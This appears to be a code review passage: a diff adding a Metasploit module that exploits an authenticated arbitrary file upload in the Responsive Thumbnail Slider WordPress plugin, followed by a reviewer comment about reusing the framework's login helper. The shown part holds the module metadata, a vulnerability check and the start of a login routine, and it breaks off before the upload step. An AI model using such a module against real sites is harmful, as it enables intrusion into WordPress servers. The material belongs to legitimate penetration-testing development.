modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Arash Khazaei', # EDB PoC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'EDB', '37998' ]
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 28 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
+      ])
+  end
+
+  def check
+    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  plugin_uri
+    )
+
+    unless res && res.code == 200
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def login
+    wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
+    res = send_request_cgi(
+    'method'  =>  'GET',
+    'uri'     =>  wp_uri
+    )
+
+    if res && res.body.include?("WordPress") && res.code == 200
+      print_status("WordPress accessed")
+    else
+      fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
+    end
+
+    redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
+    cookies = res.get_cookies
+    wp_login_res = send_request_cgi(
+      'method'  =>  'POST',
```

Comment:
Why not use the provided function in https://github.com/rapid7/metasploit-framework/blob/8ade9b8aaef3f4e16d06e815fe303e74fdda3a7b/lib/msf/core/exploit/http/wordpress/login.rb